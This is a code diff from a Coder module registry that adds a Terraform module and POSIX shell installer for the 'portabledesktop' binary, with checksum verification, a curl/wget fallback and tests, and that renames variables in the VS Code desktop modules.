+    await using fixture = await setupFakeBinaryServer(import.meta.dir, {
+      install_dir: "/opt/custom/bin",
+    });
+    await using container = await setupContainer("alpine/curl");
+
+    const script = findResourceInstance(fixture.state, "coder_script").script;
+    const resp = await execContainer(container.id, [
+      "sh",
+      "-c",
+      ENV_PREFIX + script,
+    ]);
+
+    expect(resp.exitCode).toBe(0);
+    expect(resp.stdout).toContain("portabledesktop installed successfully");
+
+    const check = await execContainer(container.id, [
+      "test",
+      "-x",
+      "/opt/custom/bin/portabledesktop",
+    ]);
+    expect(check.exitCode).toBe(0);
+  }, 30000);
+
+  it("falls back to wget when curl is not available", async () => {
+    await using fixture = await setupFakeBinaryServer(import.meta.dir);
+    await using container = await setupContainer("alpine");
+
+    // Install wget but ensure curl is not present.
+    await execContainer(container.id, [
+      "sh",
+      "-c",
+      "apk add wget && ! command -v curl",
+    ]);
+
+    const script = findResourceInstance(fixture.state, "coder_script").script;
+    const resp = await execContainer(container.id, [
+      "sh",
+      "-c",
+      ENV_PREFIX + script,
+    ]);
+
+    expect(resp.exitCode).toBe(0);
+    expect(resp.stdout).toContain("via wget");
+    expect(resp.stdout).toContain("portabledesktop installed successfully");
+  }, 30000);
+});

registry/coder/modules/portabledesktop/main.tf

@@ -0,0 +1,65 @@
+terraform {
+  required_version = ">= 1.0"
+
+  required_providers {
+    coder = {
+      source  = "coder/coder"
+      version = ">= 2.5"
+    }
+  }
+}
+
+variable "agent_id" {
+  type        = string
+  description = "The ID of a Coder agent."
+}
+
+variable "install_dir" {
+  type        = string
+  description = "Optional directory to copy the binary into (e.g. /usr/local/bin). The binary is always stored in the agent's script data directory and available on PATH via CODER_SCRIPT_BIN_DIR."
+  default     = null
+}
+
+variable "url" {
+  type        = string
+  description = "Custom download URL. Overrides the default GitHub latest release URL when set."
+  default     = null
+}
+
+variable "sha256" {
+  type        = string
+  description = "SHA256 checksum. When set, the downloaded binary is verified against it."
+  default     = null
+}
+
+locals {
+  default_amd64_url = "https://github.com/coder/portabledesktop/releases/latest/download/portabledesktop-linux-x64"
+  default_arm64_url = "https://github.com/coder/portabledesktop/releases/latest/download/portabledesktop-linux-arm64"
+
+  using_custom_url = var.url != null
+
+  amd64_url = local.using_custom_url ? var.url : local.default_amd64_url
+  arm64_url = local.using_custom_url ? var.url : local.default_arm64_url
+
+  # Empty string signals "skip verification" to the shell script.
+  sha256      = var.sha256 != null ? var.sha256 : ""
+  install_dir = var.install_dir != null ? var.install_dir : ""
+}
+
+resource "coder_script" "portabledesktop" {
+  agent_id     = var.agent_id
+  display_name = "Portable Desktop"
+  icon         = "/icon/desktop.svg"
+  script       = <<-EOT
+    #!/bin/sh
+    set -eu
+    echo -n '${base64encode(file("${path.module}/run.sh"))}' | base64 -d > /tmp/portabledesktop-install.sh
+    chmod +x /tmp/portabledesktop-install.sh
+    ARG_AMD64_URL="$(echo -n '${base64encode(local.amd64_url)}' | base64 -d)" \
+    ARG_ARM64_URL="$(echo -n '${base64encode(local.arm64_url)}' | base64 -d)" \
+    ARG_SHA256="$(echo -n '${base64encode(local.sha256)}' | base64 -d)" \
+    ARG_INSTALL_DIR="$(echo -n '${base64encode(local.install_dir)}' | base64 -d)" \
+    /tmp/portabledesktop-install.sh
+    EOT
+  run_on_start = true
+}

registry/coder/modules/portabledesktop/portabledesktop.tftest.hcl

@@ -0,0 +1,36 @@
+run "plan_with_required_vars" {
+  command = plan
+
+  variables {
+    agent_id = "example-agent-id"
+  }
+}
+
+run "plan_with_custom_install_dir" {
+  command = plan
+
+  variables {
+    agent_id    = "example-agent-id"
+    install_dir = "/opt/bin"
+  }
+
+  assert {
+    condition     = resource.coder_script.portabledesktop.display_name == "Portable Desktop"
+    error_message = "Expected coder_script resource to have correct display name"
+  }
+}
+
+run "plan_with_custom_url" {
+  command = plan
+
+  variables {
+    agent_id = "example-agent-id"
+    url      = "https://example.com/custom-portabledesktop"
+    sha256   = "abc123"
+  }
+
+  assert {
+    condition     = resource.coder_script.portabledesktop.run_on_start == true
+    error_message = "Expected coder_script to run on start"
+  }
+}

registry/coder/modules/portabledesktop/run.sh

@@ -0,0 +1,132 @@
+#!/usr/bin/env sh
+# shellcheck disable=SC2292
+# SC2292: We use [ ] instead of [[ ]] for POSIX sh compatibility.
+set -eu
+
+error() {
+  printf "ERROR: %s\n" "$@"
+  exit 1
+}
+
+# Check if portabledesktop is already in PATH.
+if command -v portabledesktop > /dev/null 2>&1; then
+  printf "portabledesktop is already installed and in PATH.\n"
+  exit 0
+fi
+
+# Determine the storage path.
+STORAGE_DIR="${CODER_SCRIPT_DATA_DIR}"
+BINARY_PATH="${STORAGE_DIR}/portabledesktop"
+mkdir -p "${STORAGE_DIR}"
+
+# If the binary already exists and is executable, skip download.
+if [ -x "${BINARY_PATH}" ]; then
+  printf "portabledesktop is already installed at %s, skipping download.\n" "${BINARY_PATH}"
+else
+  # Detect architecture and select the appropriate download URL.
+  ARCH=$(uname -m)
+  case "${ARCH}" in
+    x86_64)
+      URL="${ARG_AMD64_URL}"
+      ;;
+    aarch64)
+      URL="${ARG_ARM64_URL}"
+      ;;
+    *)
+      error "Unsupported architecture: ${ARCH}"
+      ;;
+  esac
+
+  # Select download tool.
+  if command -v curl > /dev/null 2>&1; then
+    DOWNLOAD_CMD="curl"
+  elif command -v wget > /dev/null 2>&1; then
+    DOWNLOAD_CMD="wget"
+  else
+    error "No download tool available (curl or wget required)."
+  fi
+
+  # Download with retry loop (3 attempts, 1s sleep between).
+  TMPFILE=$(mktemp)
+  MAX_ATTEMPTS=3
+  DOWNLOAD_SUCCESS=false
+  ATTEMPT=1
+
+  while [ "${ATTEMPT}" -le "${MAX_ATTEMPTS}" ]; do
+    printf "Downloading portabledesktop (attempt %s/%s) via %s...\n" "${ATTEMPT}" "${MAX_ATTEMPTS}" "${DOWNLOAD_CMD}"
+
+    DOWNLOAD_OK=false
+    if [ "${DOWNLOAD_CMD}" = "curl" ]; then
+      curl -fsSL "${URL}" -o "${TMPFILE}" && DOWNLOAD_OK=true
+    else
+      wget -qO "${TMPFILE}" "${URL}" && DOWNLOAD_OK=true
+    fi
+
+    if [ "${DOWNLOAD_OK}" = "true" ]; then
+      # Verify checksum when ARG_SHA256 is non-empty.
+      if [ -n "${ARG_SHA256}" ]; then
+        CHECKSUM_MATCH=false
+        if command -v sha256sum > /dev/null 2>&1; then
+          echo "${ARG_SHA256}  ${TMPFILE}" | sha256sum -c - > /dev/null 2>&1 && CHECKSUM_MATCH=true
+        elif command -v shasum > /dev/null 2>&1; then
+          echo "${ARG_SHA256}  ${TMPFILE}" | shasum -a 256 -c - > /dev/null 2>&1 && CHECKSUM_MATCH=true
+        else
+          rm -f "${TMPFILE}"
+          error "No SHA256 tool available (sha256sum or shasum required)."
+        fi
+
+        if [ "${CHECKSUM_MATCH}" != "true" ]; then
+          printf "WARNING: Checksum mismatch (attempt %s/%s): expected %s\n" \
+            "${ATTEMPT}" "${MAX_ATTEMPTS}" "${ARG_SHA256}"
+          rm -f "${TMPFILE}"
+          if [ "${ATTEMPT}" -lt "${MAX_ATTEMPTS}" ]; then
+            sleep 1
+          fi
+          ATTEMPT=$((ATTEMPT + 1))
+          continue
+        fi
+        printf "Checksum verified successfully.\n"
+      fi
+
+      DOWNLOAD_SUCCESS=true
+      break
+    else
+      printf "WARNING: Download failed (attempt %s/%s).\n" "${ATTEMPT}" "${MAX_ATTEMPTS}"
+      if [ "${ATTEMPT}" -lt "${MAX_ATTEMPTS}" ]; then
+        sleep 1
+      fi
+    fi
+
+    ATTEMPT=$((ATTEMPT + 1))
+  done
+
+  if [ "${DOWNLOAD_SUCCESS}" != "true" ]; then
+    rm -f "${TMPFILE}"
+    error "Failed to download portabledesktop after ${MAX_ATTEMPTS} attempts."
+  fi
+
+  # Make the binary executable and move to storage path.
+  chmod 755 "${TMPFILE}"
+  mv "${TMPFILE}" "${BINARY_PATH}"
+fi
+
+# Symlink into CODER_SCRIPT_BIN_DIR for PATH access.
+if [ -n "${CODER_SCRIPT_BIN_DIR}" ] && [ ! -e "${CODER_SCRIPT_BIN_DIR}/portabledesktop" ]; then
+  ln -s "${CODER_SCRIPT_DATA_DIR}/portabledesktop" "${CODER_SCRIPT_BIN_DIR}/portabledesktop"
+fi
+
+# If ARG_INSTALL_DIR is set, copy the binary there with sudo fallback.
+if [ -n "${ARG_INSTALL_DIR}" ]; then
+  if [ ! -d "${ARG_INSTALL_DIR}" ]; then
+    mkdir -p "${ARG_INSTALL_DIR}" 2> /dev/null || sudo mkdir -p "${ARG_INSTALL_DIR}" 2> /dev/null || true
+  fi
+  if cp "${CODER_SCRIPT_DATA_DIR}/portabledesktop" "${ARG_INSTALL_DIR}/portabledesktop" 2> /dev/null; then
+    printf "Copied portabledesktop to %s.\n" "${ARG_INSTALL_DIR}/portabledesktop"
+  elif sudo cp "${CODER_SCRIPT_DATA_DIR}/portabledesktop" "${ARG_INSTALL_DIR}/portabledesktop" 2> /dev/null; then
+    printf "Copied portabledesktop to %s (via sudo).\n" "${ARG_INSTALL_DIR}/portabledesktop"
+  else
+    error "Failed to copy portabledesktop to ${ARG_INSTALL_DIR}/portabledesktop."
+  fi
+fi
+
+printf "portabledesktop installed successfully.\n"

registry/coder/modules/vscode-desktop-core/README.md

@@ -16,15 +16,15 @@ The VSCode Desktop Core module is a building block for modules that need to expo
 ```tf
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.1"
+  version = "1.0.2"
 
   agent_id = var.agent_id
 
-  web_app_icon         = "/icon/code.svg"
-  web_app_slug         = "vscode"
-  web_app_display_name = "VS Code Desktop"
-  web_app_order        = var.order
-  web_app_group        = var.group
+  coder_app_icon         = "/icon/code.svg"
+  coder_app_slug         = "vscode"
+  coder_app_display_name = "VS Code Desktop"
+  coder_app_order        = var.order
+  coder_app_group        = var.group
 
   folder      = var.folder
   open_recent = var.open_recent

registry/coder/modules/vscode-desktop-core/main.test.ts

@@ -11,9 +11,9 @@ const appName = "vscode-desktop";
 const defaultVariables = {
   agent_id: "foo",
 
-  web_app_icon: "/icon/code.svg",
-  web_app_slug: "vscode",
-  web_app_display_name: "VS Code Desktop",
+  coder_app_icon: "/icon/code.svg",
+  coder_app_slug: "vscode",
+  coder_app_display_name: "VS Code Desktop",
 
   protocol: "vscode",
 };
@@ -99,16 +99,16 @@ describe("vscode-desktop-core", async () => {
       );
 
       expect(coder_app?.instances[0].attributes.slug).toBe(
-        defaultVariables.web_app_slug,
+        defaultVariables.coder_app_slug,
       );
       expect(coder_app?.instances[0].attributes.display_name).toBe(
-        defaultVariables.web_app_display_name,
+        defaultVariables.coder_app_display_name,
       );
     });
 
     it("sets order", async () => {
       const state = await runTerraformApply(import.meta.dir, {
-        web_app_order: "5",
+        coder_app_order: "5",
 
         ...defaultVariables,
       });
@@ -122,7 +122,7 @@ describe("vscode-desktop-core", async () => {
 
     it("sets group", async () => {
       const state = await runTerraformApply(import.meta.dir, {
-        web_app_group: "web-app-group",
+        coder_app_group: "web-app-group",
 
         ...defaultVariables,
       });

registry/coder/modules/vscode-desktop-core/main.tf

@@ -31,28 +31,28 @@ variable "protocol" {
   description = "The URI protocol the IDE."
 }
 
-variable "web_app_icon" {
+variable "coder_app_icon" {
   type        = string
   description = "The icon of the coder_app."
 }
 
-variable "web_app_slug" {
+variable "coder_app_slug" {
   type        = string
   description = "The slug of the coder_app."
 }
 
-variable "web_app_display_name" {
+variable "coder_app_display_name" {
   type        = string
   description = "The display name of the coder_app."
 }
 
-variable "web_app_order" {
+variable "coder_app_order" {
   type        = number
   description = "The order of the coder_app."
   default     = null
 }
 
-variable "web_app_group" {
+variable "coder_app_group" {
   type        = string
   description = "The group of the coder_app."
   default     = null
@@ -65,12 +65,12 @@ resource "coder_app" "vscode-desktop" {
   agent_id = var.agent_id
   external = true
 
-  icon         = var.web_app_icon
-  slug         = var.web_app_slug
-  display_name = var.web_app_display_name
+  icon         = var.coder_app_icon
+  slug         = var.coder_app_slug
+  display_name = var.coder_app_display_name
 
-  order = var.web_app_order
-  group = var.web_app_group
+  order = var.coder_app_order
+  group = var.coder_app_group
 
   url = join("", [
     var.protocol,

registry/coder/modules/vscode-desktop/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "vscode" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/vscode-desktop/coder"
-  version  = "1.2.0"
+  version  = "1.2.1"
   agent_id = coder_agent.main.id
 }
 ```
@@ -29,7 +29,7 @@ module "vscode" {
 module "vscode" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/vscode-desktop/coder"
-  version  = "1.2.0"
+  version  = "1.2.1"
   agent_id = coder_agent.main.id
   folder   = "/home/coder/project"
 }

registry/coder/modules/vscode-desktop/main.tf

@@ -40,7 +40,7 @@ variable "group" {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.0"
+  version = "1.0.2"
 
   agent_id = var.agent_id